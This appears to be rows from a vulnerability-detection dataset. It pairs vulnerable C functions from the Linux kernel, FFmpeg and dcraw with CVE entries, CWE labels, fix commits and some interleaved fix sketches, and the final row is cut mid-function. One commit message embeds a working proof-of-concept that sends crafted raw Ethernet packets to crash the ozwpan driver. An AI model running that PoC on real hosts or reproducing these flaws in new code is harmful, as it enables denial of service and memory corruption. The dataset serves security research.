if (usb_hdr->elt_seq_num != 0) {
if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0)
/* Reject duplicate element. */
goto done;
}
usb_ctx->rx_seq_num = usb_hdr->elt_seq_num;
switch (usb_hdr->type) {
case OZ_GET_DESC_RSP: {
struct oz_get_desc_rsp *body =
(struct oz_get_desc_rsp *)usb_hdr;
int data_len = elt->length -
sizeof(struct oz_get_desc_rsp) + 1;
u16 offs = le16_to_cpu(get_unaligned(&body->offset));
u16 total_size =
le16_to_cpu(get_unaligned(&body->total_size));
oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n");
oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id,
body->rcode, body->data,
data_len, offs, total_size);
}
break;
case OZ_SET_CONFIG_RSP: {
struct oz_set_config_rsp *body =
(struct oz_set_config_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport, body->req_id,
body->rcode, NULL, 0);
}
break;
case OZ_SET_INTERFACE_RSP: {
struct oz_set_interface_rsp *body =
(struct oz_set_interface_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport,
body->req_id, body->rcode, NULL, 0);
}
break;
case OZ_VENDOR_CLASS_RSP: {
struct oz_vendor_class_rsp *body =
(struct oz_vendor_class_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport, body->req_id,
body->rcode, body->data, elt->length-
sizeof(struct oz_vendor_class_rsp)+1);
}
break;
case OZ_USB_ENDPOINT_DATA:
oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length);
break;
}
done:
oz_usb_put(usb_ctx);
}
| 205,444,369,337,433,030,000,000,000,000,000,000,000 | ozusbsvc1.c | 49,251,549,535,178,640,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-4002 | drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 does not ensure that certain length values are sufficiently large, which allows remote attackers to cause a denial of service (system crash or large loop) or possibly execute arbitrary code via a crafted packet, related to the (1) oz_usb_rx and (2) oz_usb_handle_ep_data functions. | https://nvd.nist.gov/vuln/detail/CVE-2015-4002 |
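The commit message above names the fix: keep the payload length in a u8 to match elt->length and bounds-check before subtracting, so a short element can no longer produce a negative data_len for oz_hcd_get_desc_cnf() to hand to memcpy(). A hedged sketch of the corrected OZ_GET_DESC_RSP case; variable names follow the function above, and the shipped patch may differ in detail:

	case OZ_GET_DESC_RSP: {
			struct oz_get_desc_rsp *body =
				(struct oz_get_desc_rsp *)usb_hdr;
			u8 data_len;
			u16 offs, total_size;

			/* Refuse elements too short to hold the fixed part of
			 * the response before computing the payload length. */
			if (elt->length < sizeof(struct oz_get_desc_rsp) - 1)
				break;
			data_len = elt->length -
				(sizeof(struct oz_get_desc_rsp) - 1);
			offs = le16_to_cpu(get_unaligned(&body->offset));
			total_size = le16_to_cpu(get_unaligned(&body->total_size));
			oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id,
					body->rcode, body->data,
					data_len, offs, total_size);
		}
		break;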
1,474 | linux | b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length; huge amounts of network-supplied data are then
copied into the heap, which could potentially lead to remote code
execution. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
int length, int offset, int total_size)
{
struct oz_port *port = hport;
struct urb *urb;
int err = 0;
oz_dbg(ON, "oz_hcd_get_desc_cnf length = %d offs = %d tot_size = %d\n",
length, offset, total_size);
urb = oz_find_urb_by_id(port, 0, req_id);
if (!urb)
return;
if (status == 0) {
int copy_len;
int required_size = urb->transfer_buffer_length;
if (required_size > total_size)
required_size = total_size;
copy_len = required_size-offset;
if (length <= copy_len)
copy_len = length;
memcpy(urb->transfer_buffer+offset, desc, copy_len);
offset += copy_len;
if (offset < required_size) {
struct usb_ctrlrequest *setup =
(struct usb_ctrlrequest *)urb->setup_packet;
unsigned wvalue = le16_to_cpu(setup->wValue);
if (oz_enqueue_ep_urb(port, 0, 0, urb, req_id))
err = -ENOMEM;
else if (oz_usb_get_desc_req(port->hpd, req_id,
setup->bRequestType, (u8)(wvalue>>8),
(u8)wvalue, setup->wIndex, offset,
required_size-offset)) {
oz_dequeue_ep_urb(port, 0, 0, urb);
err = -ENOMEM;
}
if (err == 0)
return;
}
}
urb->actual_length = total_size;
oz_complete_urb(port->ozhcd->hcd, urb, 0);
}
| 320,708,195,163,871,100,000,000,000,000,000,000,000 | ozhcd.c | 306,747,271,140,156,940,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4001 | Integer signedness error in the oz_hcd_get_desc_cnf function in drivers/staging/ozwpan/ozhcd.c in the OZWPAN driver in the Linux kernel through 4.0.5 allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2015-4001 |
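Per the commit title, the cure is to carry length, offset and total_size as unsigned values and clamp before copying, so required_size - offset can never go negative and feed memcpy() a huge size. A sketch of the corrected copy path under that assumption; it is not the verbatim upstream hunk:

	if (status == 0) {
		unsigned int copy_len;
		unsigned int required_size = urb->transfer_buffer_length;

		if (required_size > total_size)
			required_size = total_size;
		/* Copy only when offset lies inside the buffer, and never more
		 * than both the remaining space and the supplied length. */
		if (offset < required_size) {
			copy_len = required_size - offset;
			if (copy_len > length)
				copy_len = length;
			memcpy(urb->transfer_buffer + offset, desc, copy_len);
			offset += copy_len;
		}
		/* continuation handling for partial descriptors unchanged */
	}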
1,477 | rawstudio | 983bda1f0fa5fa86884381208274198a620f006e | https://github.com/rawstudio/rawstudio | https://github.com/rawstudio/rawstudio/commit/983bda1f0fa5fa86884381208274198a620f006e | Avoid overflow in ljpeg_start(). | 1 | int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
int c, tag, len;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
fread (data, 2, 1, ifp);
if (data[1] != 0xd8) return 0;
do {
fread (data, 2, 2, ifp);
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3:
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc0:
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4:
if (info_only) break;
for (dp = data; dp < data+len && (c = *dp++) < 4; )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda:
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (info_only) return 1;
FORC(5) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
| 291,937,476,956,930,900,000,000,000,000,000,000,000 | dcraw.cc | 297,550,824,630,771,470,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-3885 | Integer overflow in the ljpeg_start function in dcraw 7.00 and earlier allows remote attackers to cause a denial of service (crash) via a crafted image, which triggers a buffer overflow, related to the len variable. | https://nvd.nist.gov/vuln/detail/CVE-2015-3885 |
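The len variable is computed as (data[2] << 8 | data[3]) - 2, so a marker whose length bytes are zero yields len == -2; fread() converts that to an enormous size_t and overruns data[0x10000]. One way to close the hole is sketched below; the actual rawstudio guard may be shaped differently:

  len = (data[2] << 8 | data[3]) - 2;
  /* A malformed marker can make len negative; passed to fread() it
     becomes a huge size_t and overflows data[]. */
  if (tag <= 0xff00 || len < 0 || len > (int) sizeof data)
    return 0;
  fread (data, 1, len, ifp);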
1,478 | linux | a134f083e79fb4c3d0a925691e732c56911b4326 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a134f083e79fb4c3d0a925691e732c56911b4326 | ipv4: Missing sk_nulls_node_init() in ping_unhash().
If we don't do that, then the poison value is left in the ->pprev
backlink.
This can cause crashes if we do a disconnect, followed by a connect().
Tested-by: Linus Torvalds <torvalds@linux-foundation.org>
Reported-by: Wen Xu <hotdog3645@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void ping_unhash(struct sock *sk)
{
struct inet_sock *isk = inet_sk(sk);
pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
if (sk_hashed(sk)) {
write_lock_bh(&ping_table.lock);
hlist_nulls_del(&sk->sk_nulls_node);
sock_put(sk);
isk->inet_num = 0;
isk->inet_sport = 0;
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
write_unlock_bh(&ping_table.lock);
}
}
| 310,891,391,724,566,200,000,000,000,000,000,000,000 | ping.c | 208,150,909,002,443,060,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-3636 | The ping_unhash function in net/ipv4/ping.c in the Linux kernel before 4.0.3 does not initialize a certain list data structure during an unhash operation, which allows local users to gain privileges or cause a denial of service (use-after-free and system crash) by leveraging the ability to make a SOCK_DGRAM socket system call for the IPPROTO_ICMP or IPPROTO_ICMPV6 protocol, and then making a connect system call after a disconnect. | https://nvd.nist.gov/vuln/detail/CVE-2015-3636 |
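The one-line fix named in the commit title goes right after the delete: hlist_nulls_del() leaves LIST_POISON in ->pprev, and sk_nulls_node_init() clears it so a later disconnect/connect sequence cannot dereference the poison value. Sketch of the hashed branch with that line added:

	if (sk_hashed(sk)) {
		write_lock_bh(&ping_table.lock);
		hlist_nulls_del(&sk->sk_nulls_node);
		sk_nulls_node_init(&sk->sk_nulls_node); /* clear poisoned ->pprev */
		sock_put(sk);
		isk->inet_num = 0;
		isk->inet_sport = 0;
		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
		write_unlock_bh(&ping_table.lock);
	}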
1,479 | FFmpeg | e8714f6f93d1a32f4e4655209960afcf4c185214 | https://github.com/FFmpeg/FFmpeg | https://github.com/FFmpeg/FFmpeg/commit/e8714f6f93d1a32f4e4655209960afcf4c185214 | avcodec/h264: Clear delayed_pic on deallocation
Fixes use of freed memory
Fixes: case5_av_frame_copy_props.mp4
Found-by: Michal Zalewski <lcamtuf@coredump.cx>
Signed-off-by: Michael Niedermayer <michaelni@gmx.at> | 1 | void ff_h264_free_tables(H264Context *h, int free_rbsp)
{
int i;
H264Context *hx;
av_freep(&h->intra4x4_pred_mode);
av_freep(&h->chroma_pred_mode_table);
av_freep(&h->cbp_table);
av_freep(&h->mvd_table[0]);
av_freep(&h->mvd_table[1]);
av_freep(&h->direct_table);
av_freep(&h->non_zero_count);
av_freep(&h->slice_table_base);
h->slice_table = NULL;
av_freep(&h->list_counts);
av_freep(&h->mb2b_xy);
av_freep(&h->mb2br_xy);
av_buffer_pool_uninit(&h->qscale_table_pool);
av_buffer_pool_uninit(&h->mb_type_pool);
av_buffer_pool_uninit(&h->motion_val_pool);
av_buffer_pool_uninit(&h->ref_index_pool);
if (free_rbsp && h->DPB) {
for (i = 0; i < H264_MAX_PICTURE_COUNT; i++)
ff_h264_unref_picture(h, &h->DPB[i]);
av_freep(&h->DPB);
} else if (h->DPB) {
for (i = 0; i < H264_MAX_PICTURE_COUNT; i++)
h->DPB[i].needs_realloc = 1;
}
h->cur_pic_ptr = NULL;
for (i = 0; i < H264_MAX_THREADS; i++) {
hx = h->thread_context[i];
if (!hx)
continue;
av_freep(&hx->top_borders[1]);
av_freep(&hx->top_borders[0]);
av_freep(&hx->bipred_scratchpad);
av_freep(&hx->edge_emu_buffer);
av_freep(&hx->dc_val_base);
av_freep(&hx->er.mb_index2xy);
av_freep(&hx->er.error_status_table);
av_freep(&hx->er.er_temp_buffer);
av_freep(&hx->er.mbintra_table);
av_freep(&hx->er.mbskip_table);
if (free_rbsp) {
av_freep(&hx->rbsp_buffer[1]);
av_freep(&hx->rbsp_buffer[0]);
hx->rbsp_buffer_size[0] = 0;
hx->rbsp_buffer_size[1] = 0;
}
if (i)
av_freep(&h->thread_context[i]);
}
}
| 160,444,303,816,193,310,000,000,000,000,000,000,000 | h264.c | 130,045,572,076,372,200,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-3417 | Use-after-free vulnerability in the ff_h264_free_tables function in libavcodec/h264.c in FFmpeg before 2.3.6 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted H.264 data in an MP4 file, as demonstrated by an HTML VIDEO element that references H.264 data. | https://nvd.nist.gov/vuln/detail/CVE-2015-3417 |
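The use-after-free comes from h->delayed_pic: the loop above unrefs and frees the DPB, but pointers into it may still sit in the delayed-output array. A hedged sketch of the cleanup the commit title describes, assuming delayed_pic is the fixed-size pointer array its name suggests:

	if (free_rbsp && h->DPB) {
		for (i = 0; i < H264_MAX_PICTURE_COUNT; i++)
			ff_h264_unref_picture(h, &h->DPB[i]);
		/* Drop delayed-output references that alias the DPB we are
		 * about to free, so later frames cannot touch freed memory. */
		memset(h->delayed_pic, 0, sizeof(h->delayed_pic));
		av_freep(&h->DPB);
	}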
1,480 | linux | 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 | fs: take i_mutex during prepare_binprm for set[ug]id executables
This prevents a race between chown() and execve(), where chowning a
setuid-user binary to root would momentarily make the binary setuid
root.
This patch was mostly written by Linus Torvalds.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | int prepare_binprm(struct linux_binprm *bprm)
{
struct inode *inode = file_inode(bprm->file);
umode_t mode = inode->i_mode;
int retval;
/* clear any previous set[ug]id data from a previous binary */
bprm->cred->euid = current_euid();
bprm->cred->egid = current_egid();
if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID) &&
!task_no_new_privs(current) &&
kuid_has_mapping(bprm->cred->user_ns, inode->i_uid) &&
kgid_has_mapping(bprm->cred->user_ns, inode->i_gid)) {
/* Set-uid? */
if (mode & S_ISUID) {
bprm->per_clear |= PER_CLEAR_ON_SETID;
bprm->cred->euid = inode->i_uid;
}
/* Set-gid? */
/*
* If setgid is set but no group execute bit then this
* is a candidate for mandatory locking, not a setgid
* executable.
*/
if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
bprm->per_clear |= PER_CLEAR_ON_SETID;
bprm->cred->egid = inode->i_gid;
}
}
/* fill in binprm security blob */
retval = security_bprm_set_creds(bprm);
if (retval)
return retval;
bprm->cred_prepared = 1;
memset(bprm->buf, 0, BINPRM_BUF_SIZE);
return kernel_read(bprm->file, 0, bprm->buf, BINPRM_BUF_SIZE);
}
| 335,498,349,453,083,000,000,000,000,000,000,000,000 | exec.c | 9,385,387,174,828,543,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-3339 | Race condition in the prepare_binprm function in fs/exec.c in the Linux kernel before 3.19.6 allows local users to gain privileges by executing a setuid program at a time instant when a chown to root is in progress, and the ownership is changed but the setuid bit is not yet stripped. | https://nvd.nist.gov/vuln/detail/CVE-2015-3339 |
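The race window is between reading inode->i_mode/i_uid/i_gid here and a concurrent chown(): the function can observe the old set[ug]id bits together with the new root ownership. The commit message says the fix serializes against chown by re-reading those fields under the inode mutex; a minimal sketch, with illustrative local variable names:

	umode_t mode = inode->i_mode;
	kuid_t uid;
	kgid_t gid;

	if (mode & (S_ISUID | S_ISGID)) {
		/* Re-read mode/uid/gid atomically under i_mutex so a racing
		 * chown() cannot hand us stale set[ug]id bits with new owners. */
		mutex_lock(&inode->i_mutex);
		mode = inode->i_mode;
		uid = inode->i_uid;
		gid = inode->i_gid;
		mutex_unlock(&inode->i_mutex);
	}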
1,481 | linux | ccfe8c3f7e52ae83155cb038753f4c75b774ca8a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/ccfe8c3f7e52ae83155cb038753f4c75b774ca8a | crypto: aesni - fix memory usage in GCM decryption
The kernel crypto API logic requires the caller to provide the
length of (ciphertext || authentication tag) as cryptlen for the
AEAD decryption operation. Thus, the cipher implementation must
calculate the size of the plaintext output itself and cannot simply use
cryptlen.
The RFC4106 GCM decryption operation tries to overwrite cryptlen memory
in req->dst. As the destination buffer for decryption only needs to hold
the plaintext memory but cryptlen references the input buffer holding
(ciphertext || authentication tag), the assumption of the destination
buffer length in RFC4106 GCM operation leads to a too large size. This
patch simply uses the already calculated plaintext size.
In addition, this patch fixes the offset calculation of the AAD buffer
pointer: as mentioned before, cryptlen already includes the size of the
tag. Thus, the tag does not need to be added. With the addition, the AAD
will be written beyond the already allocated buffer.
Note, this fixes a kernel crash that can be triggered from user space
via AF_ALG(aead) -- simply use the libkcapi test application
from [1] and update it to use rfc4106-gcm-aes.
Using [1], the changes were tested using CAVS vectors to demonstrate
that the crypto operation still delivers the right results.
[1] http://www.chronox.de/libkcapi.html
CC: Tadeusz Struk <tadeusz.struk@intel.com>
Cc: stable@vger.kernel.org
Signed-off-by: Stephan Mueller <smueller@chronox.de>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au> | 1 | static int __driver_rfc4106_decrypt(struct aead_request *req)
{
u8 one_entry_in_sg = 0;
u8 *src, *dst, *assoc;
unsigned long tempCipherLen = 0;
__be32 counter = cpu_to_be32(1);
int retval = 0;
struct crypto_aead *tfm = crypto_aead_reqtfm(req);
struct aesni_rfc4106_gcm_ctx *ctx = aesni_rfc4106_gcm_ctx_get(tfm);
u32 key_len = ctx->aes_key_expanded.key_length;
void *aes_ctx = &(ctx->aes_key_expanded);
unsigned long auth_tag_len = crypto_aead_authsize(tfm);
u8 iv_and_authTag[32+AESNI_ALIGN];
u8 *iv = (u8 *) PTR_ALIGN((u8 *)iv_and_authTag, AESNI_ALIGN);
u8 *authTag = iv + 16;
struct scatter_walk src_sg_walk;
struct scatter_walk assoc_sg_walk;
struct scatter_walk dst_sg_walk;
unsigned int i;
if (unlikely((req->cryptlen < auth_tag_len) ||
(req->assoclen != 8 && req->assoclen != 12)))
return -EINVAL;
if (unlikely(auth_tag_len != 8 && auth_tag_len != 12 && auth_tag_len != 16))
return -EINVAL;
if (unlikely(key_len != AES_KEYSIZE_128 &&
key_len != AES_KEYSIZE_192 &&
key_len != AES_KEYSIZE_256))
return -EINVAL;
/* Assuming we are supporting rfc4106 64-bit extended */
/* sequence numbers We need to have the AAD length */
/* equal to 8 or 12 bytes */
tempCipherLen = (unsigned long)(req->cryptlen - auth_tag_len);
/* IV below built */
for (i = 0; i < 4; i++)
*(iv+i) = ctx->nonce[i];
for (i = 0; i < 8; i++)
*(iv+4+i) = req->iv[i];
*((__be32 *)(iv+12)) = counter;
if ((sg_is_last(req->src)) && (sg_is_last(req->assoc))) {
one_entry_in_sg = 1;
scatterwalk_start(&src_sg_walk, req->src);
scatterwalk_start(&assoc_sg_walk, req->assoc);
src = scatterwalk_map(&src_sg_walk);
assoc = scatterwalk_map(&assoc_sg_walk);
dst = src;
if (unlikely(req->src != req->dst)) {
scatterwalk_start(&dst_sg_walk, req->dst);
dst = scatterwalk_map(&dst_sg_walk);
}
} else {
/* Allocate memory for src, dst, assoc */
src = kmalloc(req->cryptlen + req->assoclen, GFP_ATOMIC);
if (!src)
return -ENOMEM;
assoc = (src + req->cryptlen + auth_tag_len);
scatterwalk_map_and_copy(src, req->src, 0, req->cryptlen, 0);
scatterwalk_map_and_copy(assoc, req->assoc, 0,
req->assoclen, 0);
dst = src;
}
aesni_gcm_dec_tfm(aes_ctx, dst, src, tempCipherLen, iv,
ctx->hash_subkey, assoc, (unsigned long)req->assoclen,
authTag, auth_tag_len);
/* Compare generated tag with passed in tag. */
retval = crypto_memneq(src + tempCipherLen, authTag, auth_tag_len) ?
-EBADMSG : 0;
if (one_entry_in_sg) {
if (unlikely(req->src != req->dst)) {
scatterwalk_unmap(dst);
scatterwalk_done(&dst_sg_walk, 0, 0);
}
scatterwalk_unmap(src);
scatterwalk_unmap(assoc);
scatterwalk_done(&src_sg_walk, 0, 0);
scatterwalk_done(&assoc_sg_walk, 0, 0);
} else {
scatterwalk_map_and_copy(dst, req->dst, 0, req->cryptlen, 1);
kfree(src);
}
return retval;
}
| 235,636,219,205,578,550,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-3331 | The __driver_rfc4106_decrypt function in arch/x86/crypto/aesni-intel_glue.c in the Linux kernel before 3.19.3 does not properly determine the memory locations used for encrypted data, which allows context-dependent attackers to cause a denial of service (buffer overflow and system crash) or possibly execute arbitrary code by triggering a crypto API call, as demonstrated by use of a libkcapi test program with an AF_ALG(aead) socket. | https://nvd.nist.gov/vuln/detail/CVE-2015-3331 |
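Both defects the commit message describes are visible in the kmalloc path above: assoc is placed at src + req->cryptlen + auth_tag_len even though cryptlen already includes the tag, and the final scatterwalk_map_and_copy() writes req->cryptlen bytes when only the plaintext is needed. The two corrected lines, reconstructed from the commit message's description rather than quoted from the patch:

	/* cryptlen already covers (ciphertext || tag), so the AAD starts
	 * immediately after the cryptlen bytes of input. */
	assoc = (src + req->cryptlen);

	/* Write back only the recovered plaintext, not cryptlen bytes. */
	scatterwalk_map_and_copy(dst, req->dst, 0, tempCipherLen, 1);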
1,488 | linux | 6fd99094de2b83d1d4c8457f2c83483b2828e75a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/6fd99094de2b83d1d4c8457f2c83483b2828e75a | ipv6: Don't reduce hop limit for an interface
A local route may have a lower hop_limit set than global routes do.
RFC 3756, Section 4.2.7, "Parameter Spoofing"
> 1. The attacker includes a Current Hop Limit of one or another small
> number which the attacker knows will cause legitimate packets to
> be dropped before they reach their destination.
> As an example, one possible approach to mitigate this threat is to
> ignore very small hop limits. The nodes could implement a
> configurable minimum hop limit, and ignore attempts to set it below
> said limit.
Signed-off-by: D.S. Ljungmark <ljungmark@modio.se>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static void ndisc_router_discovery(struct sk_buff *skb)
{
struct ra_msg *ra_msg = (struct ra_msg *)skb_transport_header(skb);
struct neighbour *neigh = NULL;
struct inet6_dev *in6_dev;
struct rt6_info *rt = NULL;
int lifetime;
struct ndisc_options ndopts;
int optlen;
unsigned int pref = 0;
__u8 *opt = (__u8 *)(ra_msg + 1);
optlen = (skb_tail_pointer(skb) - skb_transport_header(skb)) -
sizeof(struct ra_msg);
ND_PRINTK(2, info,
"RA: %s, dev: %s\n",
__func__, skb->dev->name);
if (!(ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)) {
ND_PRINTK(2, warn, "RA: source address is not link-local\n");
return;
}
if (optlen < 0) {
ND_PRINTK(2, warn, "RA: packet too short\n");
return;
}
#ifdef CONFIG_IPV6_NDISC_NODETYPE
if (skb->ndisc_nodetype == NDISC_NODETYPE_HOST) {
ND_PRINTK(2, warn, "RA: from host or unauthorized router\n");
return;
}
#endif
/*
* set the RA_RECV flag in the interface
*/
in6_dev = __in6_dev_get(skb->dev);
if (in6_dev == NULL) {
ND_PRINTK(0, err, "RA: can't find inet6 device for %s\n",
skb->dev->name);
return;
}
if (!ndisc_parse_options(opt, optlen, &ndopts)) {
ND_PRINTK(2, warn, "RA: invalid ND options\n");
return;
}
if (!ipv6_accept_ra(in6_dev)) {
ND_PRINTK(2, info,
"RA: %s, did not accept ra for dev: %s\n",
__func__, skb->dev->name);
goto skip_linkparms;
}
#ifdef CONFIG_IPV6_NDISC_NODETYPE
/* skip link-specific parameters from interior routers */
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT) {
ND_PRINTK(2, info,
"RA: %s, nodetype is NODEFAULT, dev: %s\n",
__func__, skb->dev->name);
goto skip_linkparms;
}
#endif
if (in6_dev->if_flags & IF_RS_SENT) {
/*
* flag that an RA was received after an RS was sent
* out on this interface.
*/
in6_dev->if_flags |= IF_RA_RCVD;
}
/*
* Remember the managed/otherconf flags from most recently
* received RA message (RFC 2462) -- yoshfuji
*/
in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED |
IF_RA_OTHERCONF)) |
(ra_msg->icmph.icmp6_addrconf_managed ?
IF_RA_MANAGED : 0) |
(ra_msg->icmph.icmp6_addrconf_other ?
IF_RA_OTHERCONF : 0);
if (!in6_dev->cnf.accept_ra_defrtr) {
ND_PRINTK(2, info,
"RA: %s, defrtr is false for dev: %s\n",
